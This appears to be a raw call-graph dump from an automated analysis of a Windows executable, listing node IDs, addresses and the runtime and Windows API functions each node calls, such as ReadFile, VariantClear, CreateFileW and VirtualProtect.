66663->66664 66669 41db59 66664->66669 66670 41db3b 66664->66670 66665->66666 66671 41dc2b 66665->66671 66667 41de16 66666->66667 66668 41df9c 66666->66668 66678 417f9d __dosmaperr 46 API calls 66667->66678 66682 41dd9b 66667->66682 66673 417f77 __wcsnicmp 46 API calls 66668->66673 66672 420494 __lseeki64_nolock 48 API calls 66669->66672 66674 417f77 __wcsnicmp 46 API calls 66670->66674 66671->66682 66684 41de5b 66671->66684 66685 41dc47 66671->66685 66675 41db67 66672->66675 66676 41dfa1 66673->66676 66677 41db40 66674->66677 66675->66660 66679 417f8a __read_nolock 46 API calls 66676->66679 66680 417f8a __read_nolock 46 API calls 66677->66680 66678->66682 66679->66682 66680->66646 66681 413748 _free 46 API calls 66681->66646 66682->66646 66682->66681 66683 41ded0 ReadFile 66688 41deef GetLastError 66683->66688 66695 41def9 66683->66695 66684->66682 66684->66683 66686 41dcab ReadFile 66685->66686 66691 41dd28 66685->66691 66687 41dcc9 GetLastError 66686->66687 66694 41dcd3 66686->66694 66687->66685 66687->66694 66688->66684 66688->66695 66689 41ddec MultiByteToWideChar 66689->66682 66690 41de10 GetLastError 66689->66690 66690->66667 66691->66682 66692 41dda3 66691->66692 66693 41dd96 66691->66693 66697 41dd60 66691->66697 66692->66697 66698 41ddda 66692->66698 66696 417f77 __wcsnicmp 46 API calls 66693->66696 66694->66685 66699 420494 __lseeki64_nolock 48 API calls 66694->66699 66695->66684 66700 420494 __lseeki64_nolock 48 API calls 66695->66700 66696->66682 66697->66689 66701 420494 __lseeki64_nolock 48 API calls 66698->66701 66699->66694 66700->66695 66702 41dde9 66701->66702 66702->66689 66703->66586 66704->66601 66705->66590 66706->66594 66707->66601 66708->66597 66709->66594 66710->66607 66711->66606 66712->66601 66714 416b04 __malloc_crt 46 API calls 66713->66714 66715 420618 66714->66715 66715->66617 66716->66614 66717->66613 66721 4148b3 GetSystemTimeAsFileTime __aulldiv 66718->66721 66720 442c6b 66720->66227 66721->66720 66722->66234 66723->66239 66724->66239 66726 45272f __tzset_nolock _wcscpy 66725->66726 66727 414d04 61 API calls __fread_nolock 66726->66727 66728 44afef GetSystemTimeAsFileTime 66726->66728 66729 4528a4 66726->66729 66730 4150d1 81 API calls _fseek 66726->66730 66727->66726 66728->66726 66729->66148 66729->66149 66730->66726 66732 44b1bc 66731->66732 66733 44b1ca 66731->66733 66734 4149c2 116 API calls 66732->66734 66735 44b1e1 66733->66735 66736 4149c2 116 API calls 66733->66736 66737 44b1d8 66733->66737 66734->66733 66766 4321a4 66735->66766 66738 44b2db 66736->66738 66737->66175 66738->66735 66740 44b2e9 66738->66740 66742 44b2f6 66740->66742 66745 414a46 __fcloseall 82 API calls 66740->66745 66741 44b224 66743 44b253 66741->66743 66744 44b228 66741->66744 66742->66175 66770 43213d 66743->66770 66747 44b235 66744->66747 66748 414a46 __fcloseall 82 API calls 66744->66748 66745->66742 66749 44b245 66747->66749 66751 414a46 __fcloseall 82 API calls 66747->66751 66748->66747 66749->66175 66750 44b25a 66752 44b260 66750->66752 66753 44b289 66750->66753 66751->66749 66755 44b26d 66752->66755 66757 414a46 __fcloseall 82 API calls 66752->66757 66780 44b0bf 87 API calls 66753->66780 66758 44b27d 66755->66758 66759 414a46 __fcloseall 82 API calls 66755->66759 66756 44b28f 66781 4320f8 46 API calls _free 66756->66781 66757->66755 66758->66175 66759->66758 66761 44b295 66762 44b2a2 66761->66762 66763 414a46 __fcloseall 82 API calls 66761->66763 66764 44b2b2 66762->66764 66765 414a46 __fcloseall 82 API calls 66762->66765 66763->66762 66764->66175 66765->66764 66767 4321b4 __tzset_nolock _memmove 66766->66767 66768 4321cb 66766->66768 66767->66741 66769 414d04 __fread_nolock 61 API calls 66768->66769 66769->66767 66771 4135bb _malloc 46 API calls 66770->66771 66772 432150 66771->66772 66773 4135bb _malloc 46 API calls 66772->66773 66774 432162 66773->66774 66775 4135bb _malloc 46 API calls 66774->66775 66776 432174 66775->66776 66778 432189 66776->66778 66782 4320f8 46 API calls _free 66776->66782 66778->66750 66779 432198 66779->66750 66780->66756 66781->66761 66782->66779 66783->66083 66784->66085 66785->66103 66786->66103 66787->66103 66788->66102 66789->66103 66790->66103 66791->66108 66792->66117 66793->66119 66794->66119 66844 410160 66795->66844 66797 41012f GetFullPathNameW 66798 410147 moneypunct 66797->66798 66798->65953 66800 4102cb SHGetDesktopFolder 66799->66800 66803 410333 _wcsncpy 66799->66803 66801 4102e0 _wcsncpy 66800->66801 66800->66803 66802 41031c SHGetPathFromIDListW 66801->66802 66801->66803 66802->66803 66803->65957 66805 4101bb 66804->66805 66807 425f4a 66804->66807 66806 410160 52 API calls 66805->66806 66808 4101c7 66806->66808 66809 4114ab __wcsicoll 58 API calls 66807->66809 66812 425f6e 66807->66812 66848 410200 52 API calls 2 library calls 66808->66848 66809->66807 66811 4101d6 66849 410200 52 API calls 2 library calls 66811->66849 66812->65959 66814 4101e9 66814->65959 66816 40f760 126 API calls 66815->66816 66817 40f584 66816->66817 66818 429335 66817->66818 66819 40f58c 66817->66819 66822 4528bd 118 API calls 66818->66822 66820 40f598 66819->66820 66821 429358 66819->66821 66874 4033c0 113 API calls 7 library calls 66820->66874 66875 434034 86 API calls _wprintf 66821->66875 66825 42934b 66822->66825 66826 429373 66825->66826 66827 42934f 66825->66827 66831 4115d7 52 API calls 66826->66831 66830 431e58 82 API calls 66827->66830 66828 429369 66828->66826 66829 40f5b4 66829->65955 66830->66821 66834 4293c5 moneypunct 66831->66834 66832 42959c 66833 413748 _free 46 API calls 66832->66833 66835 4295a5 66833->66835 66834->66832 66841 401b10 52 API calls 66834->66841 66850 444af8 66834->66850 66853 44b41c 66834->66853 66860 402780 66834->66860 66868 4022d0 66834->66868 66876 44c7dd 64 API calls 3 library calls 66834->66876 66836 431e58 82 API calls 66835->66836 66837 4295b1 66836->66837 66841->66834 66845 410167 _wcslen 66844->66845 66846 4115d7 52 API calls 66845->66846 66847 41017e _wcscpy 66846->66847 66847->66797 66848->66811 66849->66814 66851 4115d7 52 API calls 66850->66851 66852 444b27 _memmove 66851->66852 66852->66834 66854 44b429 66853->66854 66855 4115d7 52 API calls 66854->66855 66856 44b440 66855->66856 66857 44b45e 66856->66857 66858 401b10 52 API calls 66856->66858 66857->66834 66859 44b453 66858->66859 66859->66834 66861 402827 66860->66861 66864 402790 moneypunct _memmove 66860->66864 66863 4115d7 52 API calls 66861->66863 66862 4115d7 52 API calls 66865 402797 66862->66865 66863->66864 66864->66862 66866 4115d7 52 API calls 66865->66866 66867 4027bd 66865->66867 66866->66867 66867->66834 66869 4022e0 66868->66869 66872 40239d 66868->66872 66870 4115d7 52 API calls 66869->66870 66869->66872 66873 402320 moneypunct 66869->66873 66870->66873 66871 4115d7 52 API calls 66871->66873 66872->66834 66873->66871 66873->66872 66874->66829 66875->66828 66876->66834 66878 402417 66877->66878 66882 402539 moneypunct 66877->66882 66879 4115d7 52 API calls 66878->66879 66878->66882 66880 402443 66879->66880 66881 4115d7 52 API calls 66880->66881 66884 4024b4 66881->66884 66882->65963 66884->66882 66885 4022d0 52 API calls 66884->66885 66906 402880 95 API calls 2 library calls 66884->66906 66885->66884 66890 401566 66886->66890 66887 401794 66907 40e9a0 90 API calls 66887->66907 66890->66887 66891 4010a0 52 API calls 66890->66891 66892 40167a 66890->66892 66891->66890 66893 4017c0 66892->66893 66908 45e737 90 API calls 3 library calls 66892->66908 66893->65965 66895 40bc70 52 API calls 66894->66895 66904 40d451 66895->66904 66896 40d50f 66911 410600 52 API calls 66896->66911 66898 427c01 66912 45e737 90 API calls 3 library calls 66898->66912 66899 40e0a0 52 API calls 66899->66904 66901 40d519 66901->65968 66902 401b10 52 API calls 66902->66904 66904->66896 66904->66898 66904->66899 66904->66901 66904->66902 66909 40f310 53 API calls 66904->66909 66910 40d860 91 API calls 66904->66910 66906->66884 66907->66892 66908->66893 66909->66904 66910->66904 66911->66901 66912->66901 66913->65981 66914->65982 66916 42c5fe 66915->66916 66931 4091c6 66915->66931 66917 40bc70 52 API calls 66916->66917 66916->66931 66918 42c64e InterlockedIncrement 66917->66918 66919 42c665 66918->66919 66924 42c697 66918->66924 66921 42c672 InterlockedDecrement Sleep InterlockedIncrement 66919->66921 66919->66924 66920 42c737 InterlockedDecrement 66922 42c74a 66920->66922 66921->66919 66921->66924 66925 408f40 VariantClear 66922->66925 66923 42c731 66923->66920 66924->66920 66924->66923 67199 408e80 66924->67199 66927 42c752 66925->66927 67208 410c60 VariantClear moneypunct 66927->67208 66931->66041 66932 42c6db 66933 402160 52 API calls 66932->66933 66934 42c6e5 66933->66934 67204 45340c 85 API calls 66934->67204 66936 42c6f1 67205 40d200 52 API calls 2 library calls 66936->67205 66938 42c6fb 67206 465124 53 API calls 66938->67206 66940 42c715 66941 42c76a 66940->66941 66942 42c719 66940->66942 66943 401b10 52 API calls 66941->66943 67207 46fe32 VariantClear 66942->67207 66945 42c77e 66943->66945 66946 401980 53 API calls 66945->66946 66952 42c796 66946->66952 66947 42c812 67210 46fe32 VariantClear 66947->67210 66949 42c82a InterlockedDecrement 67211 46ff07 54 API calls 66949->67211 66951 42c864 67212 45e737 90 API calls 3 library calls 66951->67212 66952->66947 66952->66951 67209 40ba10 52 API calls 2 library calls 66952->67209 66953 42c849 66955 42c9ec 66953->66955 66961 408f40 VariantClear 66953->66961 66965 402780 52 API calls 66953->66965 66970 401980 53 API calls 66953->66970 67214 40a780 66953->67214 67255 47d33e 331 API calls 66955->67255 66958 42c9fe 67256 46feb1 VariantClear VariantClear 66958->67256 66960 42c874 66964 408f40 VariantClear 66960->66964 66972 42ca59 66960->66972 66961->66953 66962 42ca08 66963 401b10 52 API calls 66962->66963 66966 42ca15 66963->66966 66967 42c891 66964->66967 66965->66953 66968 40c2c0 52 API calls 66966->66968 67213 410c60 VariantClear moneypunct 66967->67213 66968->66960 66970->66953 66972->66972 66974 40afc4 66973->66974 66975 40b156 66973->66975 66976 40afd5 66974->66976 66977 42d1e3 66974->66977 67266 45e737 90 API calls 3 library calls 66975->67266 66981 40a780 194 API calls 66976->66981 66998 40b11a moneypunct 66976->66998 67267 45e737 90 API calls 3 library calls 66977->67267 66980 40b143 66980->66041 66984 40b00a 66981->66984 66982 42d1f8 66986 408f40 VariantClear 66982->66986 66984->66982 66987 40b012 66984->66987 66985 42d4db 66985->66985 66986->66980 66988 40b04a 66987->66988 66989 42d231 VariantClear 66987->66989 66996 40b094 moneypunct 66987->66996 66991 40b05c moneypunct 66988->66991 67268 40e270 VariantClear moneypunct 66988->67268 66989->66991 66990 42d45a VariantClear 66990->66998 66994 4115d7 52 API calls 66991->66994 66991->66996 66993 40b108 66993->66998 67269 40e270 VariantClear moneypunct 66993->67269 66994->66996 66996->66993 66997 42d425 moneypunct 66996->66997 66997->66990 66997->66998 66998->66980 67270 45e737 90 API calls 3 library calls 66998->67270 67000 408fff 66999->67000 67019 40900d 66999->67019 67271 403ea0 52 API calls __cinit 67000->67271 67003 42c3f6 67274 45e737 90 API calls 3 library calls 67003->67274 67005 42c44a 67276 45e737 90 API calls 3 library calls 67005->67276 67006 40a780 194 API calls 67006->67019 67009 42c47b 67277 451b42 61 API calls 67009->67277 67011 42c4cb 67279 47faae 233 API calls 67011->67279 67012 42c564 67016 408f40 VariantClear 67012->67016 67013 42c491 67033 4090f2 moneypunct 67013->67033 67278 45e737 90 API calls 3 library calls 67013->67278 67015 42c548 67282 45e737 90 API calls 3 library calls 67015->67282 67016->67033 67017 42c4da 67017->67033 67280 45e737 90 API calls 3 library calls 67017->67280 67018 409112 67018->67015 67026 40912b 67018->67026 67019->67003 67019->67005 67019->67006 67019->67009 67019->67011 67019->67012 67019->67015 67019->67018 67021 42c528 67019->67021 67023 4090df 67019->67023 67024 4090ea 67019->67024 67019->67033 67273 4534e3 52 API calls 67019->67273 67275 40c4e0 194 API calls 67019->67275 67281 45e737 90 API calls 3 library calls 67021->67281 67023->67024 67028 408e80 VariantClear 67023->67028 67029 408f40 VariantClear 67024->67029 67026->67033 67272 403e10 53 API calls 67026->67272 67028->67024 67029->67033 67031 40914b 67032 408f40 VariantClear 67031->67032 67032->67033 67033->66041 67283 408d90 67034->67283 67036 429778 67312 410c60 VariantClear moneypunct 67036->67312 67038 408cf9 67038->67036 67040 42976c 67038->67040 67042 408d2d 67038->67042 67039 429780 67311 45e737 90 API calls 3 library calls 67040->67311 67299 403d10 67042->67299 67045 408d71 moneypunct 67045->66041 67046 408f40 VariantClear 67047 408d45 moneypunct 67046->67047 67047->67045 67047->67046 67049 4096c6 _wcslen 67048->67049 67050 4115d7 52 API calls 67049->67050 67114 40a70c moneypunct _memmove 67049->67114 67051 4096fa _memmove 67050->67051 67053 4115d7 52 API calls 67051->67053 67052 4013a0 52 API calls 67055 4297aa 67052->67055 67054 40971b 67053->67054 67056 409749 CharUpperBuffW 67054->67056 67059 40976a moneypunct 67054->67059 67054->67114 67057 4115d7 52 API calls 67055->67057 67056->67059 67099 4297d1 _memmove 67057->67099 67096 4097e5 moneypunct 67059->67096 67614 47dcbb 196 API calls 67059->67614 67061 408f40 VariantClear 67062 42ae92 67061->67062 67641 410c60 VariantClear moneypunct 67062->67641 67064 42aea4 67065 409aa2 67067 4115d7 52 API calls 67065->67067 67071 409afe 67065->67071 67065->67099 67066 40a689 67068 4115d7 52 API calls 67066->67068 67067->67071 67086 40a6af moneypunct _memmove 67068->67086 67069 409b2a 67073 429dbe 67069->67073 67141 409b4d moneypunct _memmove 67069->67141 67622 40b400 VariantClear VariantClear moneypunct 67069->67622 67070 40c2c0 52 API calls 67070->67096 67071->67069 67072 4115d7 52 API calls 67071->67072 67074 429d31 67072->67074 67079 429dd3 67073->67079 67623 40b400 VariantClear VariantClear moneypunct 67073->67623 67078 429d42 67074->67078 67619 44a801 52 API calls 67074->67619 67075 429a46 VariantClear 67075->67096 67076 409fd2 67083 40a045 67076->67083 67135 42a3f5 67076->67135 67084 40e0a0 52 API calls 67078->67084 67079->67141 67624 40e1c0 VariantClear moneypunct 67079->67624 67080 408f40 VariantClear 67080->67096 67088 4115d7 52 API calls 67083->67088 67091 429d57 67084->67091 67095 4115d7 52 API calls 67086->67095 67097 40a04c 67088->67097 67089 4115d7 52 API calls 67089->67096 67620 453443 52 API calls 67091->67620 67093 42a42f 67628 45e737 90 API calls 3 library calls 67093->67628 67095->67114 67096->67065 67096->67066 67096->67070 67096->67075 67096->67080 67096->67086 67096->67089 67096->67099 67100 4299d9 67096->67100 67103 429abd 67096->67103 67111 40a780 194 API calls 67096->67111 67112 42a452 67096->67112 67615 40c4e0 194 API calls 67096->67615 67617 40ba10 52 API calls 2 library calls 67096->67617 67618 40e270 VariantClear moneypunct 67096->67618 67098 40a0a7 67097->67098 67102 4091e0 317 API calls 67097->67102 67121 40a0af 67098->67121 67629 40c790 VariantClear moneypunct 67098->67629 67640 45e737 90 API calls 3 library calls 67099->67640 67104 408f40 VariantClear 67100->67104 67102->67098 67103->66041 67106 4299e2 67104->67106 67105 429d88 67621 453443 52 API calls 67105->67621 67616 410c60 VariantClear moneypunct 67106->67616 67111->67096 67112->67061 67114->67052 67115 402780 52 API calls 67115->67141 67116 4115d7 52 API calls 67116->67141 67118 44a801 52 API calls 67118->67141 67119 408f40 VariantClear 67149 40a162 moneypunct _memmove 67119->67149 67120 41130a 51 API calls __cinit 67120->67141 67122 40a11b 67121->67122 67123 42a4b4 VariantClear 67121->67123 67121->67149 67129 40a12d moneypunct 67122->67129 67630 40e270 VariantClear moneypunct 67122->67630 67123->67129 67124 40a780 194 API calls 67124->67141 67126 401980 53 API calls 67126->67141 67127 408e80 VariantClear 67127->67141 67128 4115d7 52 API calls 67128->67149 67129->67128 67129->67149 67130 408e80 VariantClear 67130->67149 67132 42a74d VariantClear 67132->67149 67133 40a368 67136 42aad4 67133->67136 67143 40a397 67133->67143 67134 40e270 VariantClear 67134->67149 67627 47390f VariantClear 67135->67627 67633 46fe90 VariantClear VariantClear moneypunct 67136->67633 67137 42a7e4 VariantClear 67137->67149 67138 42a886 VariantClear 67138->67149 67140 409c95 67140->66041 67141->67076 67141->67093 67141->67114 67141->67115 67141->67116 67141->67118 67141->67120 67141->67124 67141->67126 67141->67127 67141->67135 67141->67140 67625 45f508 52 API calls 67141->67625 67626 403e10 53 API calls 67141->67626 67142 40a3ce 67153 40a3d9 moneypunct 67142->67153 67634 40b400 VariantClear VariantClear moneypunct 67142->67634 67143->67142 67168 40a42c moneypunct 67143->67168 67613 40b400 VariantClear VariantClear moneypunct 67143->67613 67146 4115d7 52 API calls 67146->67149 67147 42abaf 67152 42abd4 VariantClear 67147->67152 67161 40a4ee moneypunct 67147->67161 67148 4115d7 52 API calls 67151 42a5a6 VariantInit VariantCopy 67148->67151 67149->67119 67149->67130 67149->67132 67149->67133 67149->67134 67149->67136 67149->67137 67149->67138 67149->67146 67149->67148 67631 470870 52 API calls 67149->67631 67632 44ccf1 VariantClear moneypunct 67149->67632 67150 40a4dc 67150->67161 67636 40e270 VariantClear moneypunct 67150->67636 67151->67149 67155 42a5c6 VariantClear 67151->67155 67152->67161 67154 40a41a 67153->67154 67160 42ab44 VariantClear 67153->67160 67153->67168 67154->67168 67635 40e270 VariantClear moneypunct 67154->67635 67155->67149 67156 42ac4f 67162 42ac79 VariantClear 67156->67162 67166 40a546 moneypunct 67156->67166 67159 40a534 67159->67166 67637 40e270 VariantClear moneypunct 67159->67637 67160->67168 67161->67156 67161->67159 67162->67166 67163 42ad28 67169 42ad4e VariantClear 67163->67169 67173 40a583 moneypunct 67163->67173 67166->67163 67167 40a571 67166->67167 67167->67173 67638 40e270 VariantClear moneypunct 67167->67638 67168->67147 67168->67150 67169->67173 67171 40a650 moneypunct 67171->66041 67172 42ae0e VariantClear 67172->67173 67173->67171 67173->67172 67639 40e270 VariantClear moneypunct 67173->67639 67175->66041 67176->66041 67177->66041 67178->65991 67179->65996 67180->66041 67181->66041 67182->66041 67183->66041 67184->66049 67185->66049 67186->66049 67187->66049 67188->66049 67189->66049 67190->66049 67192 403cdf 67191->67192 67193 408f40 VariantClear 67192->67193 67194 403ce7 67193->67194 67194->66035 67195->66049 67196->66049 67197->66041 67198->66004 67200 408e88 67199->67200 67202 408e94 67199->67202 67201 408f40 VariantClear 67200->67201 67201->67202 67203 45340c 85 API calls 67202->67203 67203->66932 67204->66936 67205->66938 67206->66940 67207->66923 67208->66931 67209->66952 67210->66949 67211->66953 67212->66960 67213->66931 67215 40a7a6 67214->67215 67216 40ae8c 67214->67216 67218 4115d7 52 API calls 67215->67218 67257 41130a 51 API calls __cinit 67216->67257 67231 40a7c6 moneypunct _memmove 67218->67231 67219 40a86d 67220 40abd1 67219->67220 67237 40a878 moneypunct 67219->67237 67262 45e737 90 API calls 3 library calls 67220->67262 67221 401b10 52 API calls 67221->67231 67223 42b791 VariantClear 67223->67231 67224 40bc10 53 API calls 67224->67231 67225 408e80 VariantClear 67225->67231 67226 4115d7 52 API calls 67226->67231 67227 42ba2d VariantClear 67227->67231 67228 408f40 VariantClear 67228->67237 67229 42b459 VariantClear 67229->67231 67230 40a884 moneypunct 67230->66953 67231->67219 67231->67220 67231->67221 67231->67223 67231->67224 67231->67225 67231->67226 67231->67227 67231->67229 67233 408cc0 187 API calls 67231->67233 67234 42b6f6 VariantClear 67231->67234 67235 40e270 VariantClear 67231->67235 67236 42bb6a 67231->67236 67238 42bbf5 67231->67238 67239 40b5f0 89 API calls 67231->67239 67242 4115d7 52 API calls 67231->67242 67244 408f40 VariantClear 67231->67244 67249 42bc37 67231->67249 67254 4530c9 VariantClear 67231->67254 67258 45308a 53 API calls 67231->67258 67259 470870 52 API calls 67231->67259 67260 457f66 87 API calls __write_nolock 67231->67260 67261 472f47 127 API calls 67231->67261 67233->67231 67234->67231 67235->67231 67265 44b92d VariantClear 67236->67265 67237->67228 67237->67230 67263 45e737 90 API calls 3 library calls 67238->67263 67239->67231 67240 42bc5b 67240->66953 67245 42b5b3 VariantInit VariantCopy 67242->67245 67244->67231 67245->67231 67247 42b5d7 VariantClear 67245->67247 67247->67231 67264 45e737 90 API calls 3 library calls 67249->67264 67252 42bc48 67252->67236 67253 408f40 VariantClear 67252->67253 67253->67236 67254->67231 67255->66958 67256->66962 67257->67231 67258->67231 67259->67231 67260->67231 67261->67231 67262->67236 67263->67236 67264->67252 67265->67240 67266->66977 67267->66982 67268->66991 67269->66998 67270->66985 67271->67019 67272->67031 67273->67019 67274->67033 67275->67019 67276->67033 67277->67013 67278->67033 67279->67017 67280->67033 67281->67033 67282->67012 67284 4289d2 67283->67284 67285 408db3 67283->67285 67315 45e737 90 API calls 3 library calls 67284->67315 67313 40bec0 90 API calls 67285->67313 67288 4289e5 67316 45e737 90 API calls 3 library calls 67288->67316 67291 428a05 67292 408f40 VariantClear 67291->67292 67298 408e5a 67292->67298 67293 40a780 194 API calls 67296 408dc9 67293->67296 67294 408e64 67295 408f40 VariantClear 67294->67295 67295->67298 67296->67288 67296->67291 67296->67293 67296->67294 67297 408f40 VariantClear 67296->67297 67296->67298 67314 40ba10 52 API calls 2 library calls 67296->67314 67297->67296 67298->67038 67300 408f40 VariantClear 67299->67300 67301 403d20 67300->67301 67302 403cd0 VariantClear 67301->67302 67303 403d4d 67302->67303 67306 4013c0 52 API calls 67303->67306 67317 45e17d 67303->67317 67327 4755ad 67303->67327 67330 467897 67303->67330 67374 40de10 67303->67374 67379 46e91c 67303->67379 67304 403d76 67304->67036 67304->67047 67306->67304 67311->67036 67312->67039 67313->67296 67314->67296 67315->67288 67316->67291 67318 45e198 67317->67318 67319 45e19c 67318->67319 67320 45e1b8 67318->67320 67323 408f40 VariantClear 67319->67323 67321 45e1cc 67320->67321 67322 45e1db FindClose 67320->67322 67326 45e1d9 moneypunct 67321->67326 67382 44ae3e 67321->67382 67322->67326 67324 45e1a4 67323->67324 67324->67304 67326->67304 67395 475077 67327->67395 67329 4755c0 67329->67304 67331 4678bb 67330->67331 67332 467954 67331->67332 67513 45340c 85 API calls 67331->67513 67333 4115d7 52 API calls 67332->67333 67360 467964 67332->67360 67334 467989 67333->67334 67336 467995 67334->67336 67517 40da60 53 API calls 67334->67517 67340 4533eb 85 API calls 67336->67340 67337 4678f6 67339 413a0e __wsplitpath 46 API calls 67337->67339 67341 4678fc 67339->67341 67343 4679b7 67340->67343 67342 401b10 52 API calls 67341->67342 67345 46790c 67342->67345 67501 40de40 67343->67501 67514 40d200 52 API calls 2 library calls 67345->67514 67348 4679c7 GetLastError 67349 403cd0 VariantClear 67348->67349 67352 4679dc 67349->67352 67350 467917 67350->67332 67515 4339fa GetFileAttributesW FindFirstFileW FindClose 67350->67515 67351 467a05 67354 467a2c 67351->67354 67355 467a4b 67351->67355 67357 4679e6 67352->67357 67362 44ae3e CloseHandle 67352->67362 67356 4115d7 52 API calls 67354->67356 67358 4115d7 52 API calls 67355->67358 67361 467a31 67356->67361 67365 408f40 VariantClear 67357->67365 67363 467a49 67358->67363 67359 467928 67359->67332 67364 46792f 67359->67364 67360->67304 67518 436299 52 API calls 2 library calls 67361->67518 67362->67357 67369 408f40 VariantClear 67363->67369 67516 4335cd 56 API calls 3 library calls 67364->67516 67368 4679ed 67365->67368 67368->67304 67371 467a88 67369->67371 67370 467939 67370->67332 67372 408f40 VariantClear 67370->67372 67371->67304 67373 467947 67372->67373 67373->67332 67375 4115d7 52 API calls 67374->67375 67376 40de23 67375->67376 67377 40da20 CloseHandle 67376->67377 67378 40de2e 67377->67378 67378->67304 67531 46e785 67379->67531 67381 46e92f 67381->67304 67385 443fdf 67382->67385 67384 44ae4b moneypunct 67384->67326 67390 40da20 67385->67390 67387 443feb 67394 4340db CloseHandle moneypunct 67387->67394 67389 444001 67389->67384 67391 40da37 67390->67391 67392 40da29 67390->67392 67391->67392 67393 40da3c CloseHandle 67391->67393 67392->67387 67393->67387 67394->67389 67448 4533eb 67395->67448 67398 4750ee 67400 408f40 VariantClear 67398->67400 67399 475129 67452 4646e0 67399->67452 67408 4750f5 67400->67408 67402 47515e 67403 475162 67402->67403 67435 47518e 67402->67435 67404 408f40 VariantClear 67403->67404 67422 475169 67404->67422 67405 475357 67406 475365 67405->67406 67407 4754ea 67405->67407 67486 44b3ac 57 API calls 67406->67486 67492 464812 92 API calls 67407->67492 67408->67329 67412 4754fc 67413 475374 67412->67413 67414 475508 67412->67414 67465 430d31 67413->67465 67416 408f40 VariantClear 67414->67416 67415 4533eb 85 API calls 67415->67435 67418 47550f 67416->67418 67418->67422 67419 475388 67472 4577e9 67419->67472 67422->67329 67423 47539e 67480 410cfc 67423->67480 67424 475480 67425 408f40 VariantClear 67424->67425 67425->67422 67428 4753d4 67488 40e830 53 API calls 67428->67488 67429 4753b8 67487 45e737 90 API calls 3 library calls 67429->67487 67432 4753c5 GetCurrentProcess TerminateProcess 67432->67428 67433 4754b5 67436 408f40 VariantClear 67433->67436 67434 4753e3 67446 475406 67434->67446 67489 40cf00 53 API calls 67434->67489 67435->67405 67435->67415 67435->67424 67435->67433 67484 436299 52 API calls 2 library calls 67435->67484 67485 463ad5 64 API calls __wcsicoll 67435->67485 67436->67422 67438 475556 67438->67422 67439 4753f8 67444 408e80 VariantClear 67444->67446 67446->67438 67446->67444 67447 408f40 VariantClear 67446->67447 67491 40cf00 53 API calls 67446->67491 67493 44b3ac 57 API calls 67446->67493 67447->67446 67449 453404 67448->67449 67450 4533f8 67448->67450 67449->67398 67449->67399 67450->67449 67495 4531b1 85 API calls 5 library calls 67450->67495 67496 4536f7 53 API calls 67452->67496 67454 4646fc 67497 4426cd 59 API calls _wcslen 67454->67497 67456 464711 67458 40bc70 52 API calls 67456->67458 67464 46474b 67456->67464 67459 46472c 67458->67459 67498 461465 52 API calls _memmove 67459->67498 67461 464741 67462 40c600 52 API calls 67461->67462 67462->67464 67463 464793 67463->67402 67464->67463 67499 463ad5 64 API calls __wcsicoll 67464->67499 67466 430db2 67465->67466 67467 430d54 67465->67467 67466->67419 67468 4115d7 52 API calls 67467->67468 67471 430d74 67468->67471 67469 430da9 67469->67419 67470 4115d7 52 API calls 67470->67471 67471->67469 67471->67470 67473 457a84 67472->67473 67479 45780c _strcat moneypunct _wcslen _wcscpy 67472->67479 67473->67423 67474 443006 57 API calls 67474->67479 67475 45340c 85 API calls 67475->67479 67477 4135bb 46 API calls _malloc 67477->67479 67478 40f6f0 54 API calls 67478->67479 67479->67473 67479->67474 67479->67475 67479->67477 67479->67478 67500 44b3ac 57 API calls 67479->67500 67481 410d11 67480->67481 67482 410da9 VirtualProtect 67481->67482 67483 410d77 67481->67483 67482->67483 67483->67428 67483->67429 67484->67435 67485->67435 67486->67413 67487->67432 67488->67434 67489->67439 67491->67446 67492->67412 67493->67446 67495->67449 67496->67454 67497->67456 67498->67461 67499->67463 67500->67479 67502 40da20 CloseHandle 67501->67502 67503 40de4e 67502->67503 67519 40f110 67503->67519 67505 4264fa 67508 40de84 67528 40e080 SetFilePointerEx SetFilePointerEx 67508->67528 67510 40de8b 67529 40f160 SetFilePointerEx SetFilePointerEx WriteFile 67510->67529 67512 40de90 67512->67348 67512->67351 67513->67337 67514->67350 67515->67359 67516->67370 67517->67336 67518->67363 67520 40f125 CreateFileW 67519->67520 67521 42630c 67519->67521 67523 40de74 67520->67523 67522 426311 CreateFileW 67521->67522 67521->67523 67522->67523 67524 426337 67522->67524 67523->67505 67527 40dea0 55 API calls moneypunct 67523->67527 67530 40df90 SetFilePointerEx SetFilePointerEx 67524->67530 67526 426342 67526->67523 67527->67508 67528->67510 67529->67512 67530->67526 67532 46e7a2 67531->67532 67533 4115d7 52 API calls 67532->67533 67536 46e802 67532->67536 67534 46e7ad 67533->67534 67535 46e7b9 67534->67535 67579 40da60 53 API calls 67534->67579 67540 4533eb 85 API calls 67535->67540 67537 46e7e5 67536->67537 67544 46e82f 67536->67544 67538 408f40 VariantClear 67537->67538 67541 46e7ea 67538->67541 67542 46e7ca 67540->67542 67541->67381 67545 40de40 60 API calls 67542->67545 67543 46e8b5 67572 4680ed 67543->67572 67544->67543 67546 46e845 67544->67546 67547 46e7d7 67545->67547 67549 4533eb 85 API calls 67546->67549 67547->67544 67550 46e7db 67547->67550 67559 46e84b 67549->67559 67550->67537 67553 44ae3e CloseHandle 67550->67553 67551 46e8bb 67576 443fbe 67551->67576 67552 46e87a 67580 4689f4 59 API calls 67552->67580 67553->67537 67555 46e883 67558 4013c0 52 API calls 67555->67558 67560 46e88f 67558->67560 67559->67552 67559->67555 67562 40e0a0 52 API calls 67560->67562 67561 408f40 VariantClear 67570 46e881 67561->67570 67563 46e899 67562->67563 67581 40d200 52 API calls 2 library calls 67563->67581 67565 46e911 67565->67381 67566 46e8a5 67582 4689f4 59 API calls 67566->67582 67567 40da20 CloseHandle 67569 46e903 67567->67569 67571 44ae3e CloseHandle 67569->67571 67570->67565 67570->67567 67571->67565 67573 468100 67572->67573 67574 4680fa 67572->67574 67573->67551 67583 467ac4 67574->67583 67606 443e36 67576->67606 67578 443fd3 67578->67561 67578->67570 67579->67535 67580->67570 67581->67566 67582->67570 67584 467bb8 67583->67584 67585 467adc 67583->67585 67584->67573 67586 467c1d 67585->67586 67587 467c16 67585->67587 67588 467b90 67585->67588 67596 467aed 67585->67596 67590 4115d7 52 API calls 67586->67590 67605 40e270 VariantClear moneypunct 67587->67605 67591 4115d7 52 API calls 67588->67591 67602 467b75 _memmove 67590->67602 67591->67602 67592 467b28 moneypunct 67592->67586 67593 467b55 67592->67593 67592->67602 67595 4115d7 52 API calls 67593->67595 67594 4115d7 52 API calls 67594->67584 67597 467b5b 67595->67597 67596->67592 67599 4115d7 52 API calls 67596->67599 67603 442ee0 52 API calls 67597->67603 67599->67592 67600 467b6b 67604 45f645 54 API calls moneypunct 